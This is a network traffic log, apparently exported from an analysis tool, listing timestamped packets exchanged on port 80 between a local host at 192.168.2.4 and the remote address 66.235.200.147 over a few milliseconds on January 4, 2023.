Jan 4, 2023 16:47:45.292510986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292524099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292531967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292551041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292555094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292567968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292572021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292593956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292601109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292614937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292632103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292635918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292656898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292659044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292675972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292687893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292696953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292716980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292721987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292737007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292751074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292757988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292778969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292787075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292798996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292818069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292824030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292840004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292850971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292860985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292887926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292907953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292927980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292947054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292952061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292968988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.292980909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292980909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.292989969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293009996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293014050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293030977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293036938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293051004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293071032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293071985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293091059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293101072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293111086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293129921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293134928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293149948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293169975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293169975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293190956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293210030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293216944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293230057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293250084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293252945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293270111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293277025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293291092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293309927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293312073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293329954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293340921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293349028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293370008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293374062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293390036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293410063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293412924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293431997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293431997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293452978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293466091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293473005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293488026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293494940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293512106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293515921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293536901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293555975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293560982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293576002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293592930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293596029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293617964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293627024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293637991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293648005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293658018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293678045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293684006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293699026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293718100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293730021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293736935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293752909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293756962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293778896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293790102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293798923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293818951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293823004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293838978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293850899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293859005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293878078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293880939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293898106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293915987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293917894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293939114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293946981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293958902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.293981075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.293981075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294001102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294018984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294018984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294019938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294042110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294045925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294063091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294079065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294083118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294112921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294114113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294132948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294143915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294152021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294173002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294179916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294193983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294212103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294214010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294234991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294235945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294256926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294266939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294276953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294289112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294298887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294312954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294320107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294334888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294341087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294361115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294361115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294380903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294394970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294400930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294420958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294426918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294442892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294456959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294464111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294486046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294487953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294507027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294522047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294528008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294548035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294554949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294569016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294588089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294589996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294609070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294614077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294629097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294645071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294650078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294667006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294671059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294706106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294708014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294732094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294737101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294754982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294759035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294778109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294789076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294816017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294826031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294841051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294842958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294871092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294871092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294893980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294899940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294925928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294928074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294951916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294960022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294972897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.294981003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.294992924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295001030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295012951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295025110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295032978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295053959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295073986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295093060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295099020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295114040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295134068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295137882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295154095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295160055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295173883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295193911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295193911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295213938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295223951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295233011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295252085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295258999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295272112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295289040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295290947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295310974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295315981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295331955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295346975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295351982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295372963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295378923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295393944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295413017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295413017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295432091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295444012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295452118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295470953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295475960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295492887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295512915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295514107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295532942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295536041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295552969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295568943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295574903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295588017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295608044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295613050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295630932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295634031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295651913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295655012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295675993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295677900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295696020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295697927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295716047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295720100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295736074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295742989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295756102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295763016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295777082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295788050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295799017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295809984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295818090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295830011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295838118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295851946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295859098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295875072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295881033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295902014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295906067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295922041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295941114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295943975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295960903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295979977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.295983076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.295999050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296010017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296020031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296040058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296041965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296060085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296072006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296080112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296099901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296102047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296120882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296128035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296142101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296159029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296160936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296180964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296190023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296200991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296220064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296225071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296240091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296257019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296260118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296278000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296279907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296300888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296308041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296319962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296328068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296339989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296350002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296360016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296374083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296380043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296394110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296401024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296415091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296422005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296435118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296442986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296458960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296463013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296483040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296489954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296502113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296520948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296524048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296540976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296554089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296560049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296580076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296586037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296601057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296619892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296623945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296623945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296639919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296647072 CET	49696	80	192.168.2.4	66.235.200.147
